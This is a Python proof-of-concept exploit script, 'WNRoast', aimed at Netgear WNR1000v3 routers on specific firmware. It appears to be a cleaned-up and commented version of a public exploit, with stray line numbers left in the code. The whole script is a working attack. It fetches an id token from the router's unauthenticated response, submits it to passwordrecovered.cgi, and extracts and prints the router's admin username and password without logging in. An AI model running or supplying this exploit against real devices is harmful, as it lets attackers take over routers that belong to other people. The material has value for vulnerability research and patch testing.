wnroast.py

  1. ######################################################################################
  2. # WNRoast Version 1.0 #
  3. # Netgear WNR1000v3 Credential Harvesting Exploit (Proof of Concept) #
  4. # Tested On Firmware Version(s): V1.0.2.60_60.0.86 (Latest) and V1.0.2.54_60.0.82NA #
  5. # By: c1ph04 #
  6. # #
  7. # Not the prettiest, but I need to get this done before the baby wakes up #
  8. ######################################################################################
  9.  
  10. import socket
  11. import urllib
  12. import urllib2
  13. import sys
  14.  
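CRLF = "\r\n"

# Seconds to wait for connect/recv on the raw socket below.  The original
# PoC set no timeout and would block forever on a host that never answers.
TIMEOUT = 10.0

# Minimal hand-built HTTP/1.1 request for "/".  "Host: none" and the two
# trailing empty strings (they produce the blank line that terminates the
# header block once joined with CRLF) are kept exactly as in the original
# PoC, because the device's reply to this request is where the "id=" token
# is searched for later in the script.
request = [
    "GET / HTTP/1.1",
    "Host: none",
    "Connection: Close",
    "",
    "",
]
# ---------------------------------------------------

# Fail with a usage line instead of an IndexError / ValueError traceback
# when the host or port argument is missing or malformed.
if len(sys.argv) != 3:
    sys.stderr.write("usage: %s <host> <port>\n" % sys.argv[0])
    sys.exit(1)

try:
    target_port = int(sys.argv[2])
except ValueError:
    sys.stderr.write("port must be an integer, got %r\n" % sys.argv[2])
    sys.exit(1)

chunks = []
s = socket.socket()
s.settimeout(TIMEOUT)
try:
    s.connect((sys.argv[1], target_port))
    # sendall() keeps writing until the whole request is out; plain send()
    # may return after writing only a prefix of the buffer.
    s.sendall(CRLF.join(request))

    # "Connection: Close" asks the device to close the connection once the
    # response is complete, so read until recv() returns an empty string.
    chunk = s.recv(4096)
    while chunk:
        chunks.append(chunk)
        chunk = s.recv(4096)
except socket.error as e:
    sys.stderr.write("Connection to %s:%d failed: %s\n"
                     % (sys.argv[1], target_port, e))
    sys.exit(1)
finally:
    # The original never closed the socket; close it on every path.
    s.close()

response = ''.join(chunks)

# Split the raw response into the header block and the body at the first
# blank line; only the body is inspected afterwards.
header_data, _, body = response.partition(CRLF + CRLF)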
  38.  
  39. #-----------------------------------------------------
  40.  
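def extract_between(text, sub1, sub2, nth=1):
    """Return the substring of *text* between a *sub1* marker and the next *sub2*.

    The slice starts after the *nth* occurrence of *sub1* (or after the last
    occurrence when *text* holds fewer than *nth*), and ends just before the
    first *sub2* that follows it.

    Returns None when *sub1* does not occur in *text* at all, or when no
    *sub2* follows the chosen *sub1*.  The original returned the prefix of
    *text* before *sub2* when *sub1* was absent, which silently produced
    garbage for callers that treat the result as a parsed value.

    Raises ValueError if *sub1* or *sub2* is the empty string (str.split).
    """
    if sub1 not in text:
        return None
    tail = text.split(sub1, nth)[-1]
    if sub2 not in tail:
        return None
    return tail.split(sub2, 1)[0]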
  46.  
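# Only run this against devices you own or are explicitly authorized to
# test: it retrieves the router's admin credentials without logging in.

# The device's unauthenticated "/" response carries an id=... token; the
# PoC relies on passwordrecovered.cgi accepting that token.  The original
# wrapped the result in repr() and stripped quotes, so a missing token
# turned into the literal string "None" and the request was sent anyway.
uid = extract_between(body, 'id=', '"')
if uid is None:
    sys.stderr.write("No id= token found in the device response; the target "
                     "may not be a WNR1000v3 or may not be affected.\n")
    sys.exit(1)

# -----------------------------------------------------

# Send POST To Get Credentials

ip = sys.argv[1]
port = sys.argv[2]

# The id comes from an untrusted response, so percent-encode it before
# placing it in the query string instead of concatenating it raw.
url = ('http://%s:%s/passwordrecovered.cgi?id=%s'
       % (ip, port, urllib.quote(uid, safe='')))

# data='' (not None) makes urllib2 issue a POST with an empty body, which
# is exactly what the original PoC sent.
req = urllib2.Request(url, '')
try:
    the_page = urllib2.urlopen(req, timeout=10.0).read()
except urllib2.URLError as e:
    sys.stderr.write("Request to %s failed: %s\n" % (url, e))
    sys.exit(1)

# -------------------------------------------------------


def _cell_value(page, label):
    """Return the text of the table cell following the cell labelled *label*.

    Mirrors the original parse: take everything between '<label></td>' and
    the next '</td>', then drop that cell's opening tag (everything up to
    and including the first '>').  Returns None when the label or the
    closing tag is absent.  Unlike the original repr()-based version, a
    value containing a single quote is no longer truncated at the quote.
    """
    cell = extract_between(page, label + '</td>', '</td>')
    if cell is None:
        return None
    return cell.split('>', 1)[-1]


username = _cell_value(the_page, 'Router Admin Username')
password = _cell_value(the_page, 'Router Admin Password')

if username is None or password is None:
    sys.stderr.write("passwordrecovered.cgi answered, but no credential table "
                     "was found in the response.\n")
    sys.exit(1)

print("""

WNRoast Version 1.0
=========================
By: c1ph04

""")
print("\n WNRoasted!\n")
# The recovered credentials go to stdout; be careful where this output is
# redirected or logged.
print(" Username is: " + username + '\n')
print(" Password is: " + password)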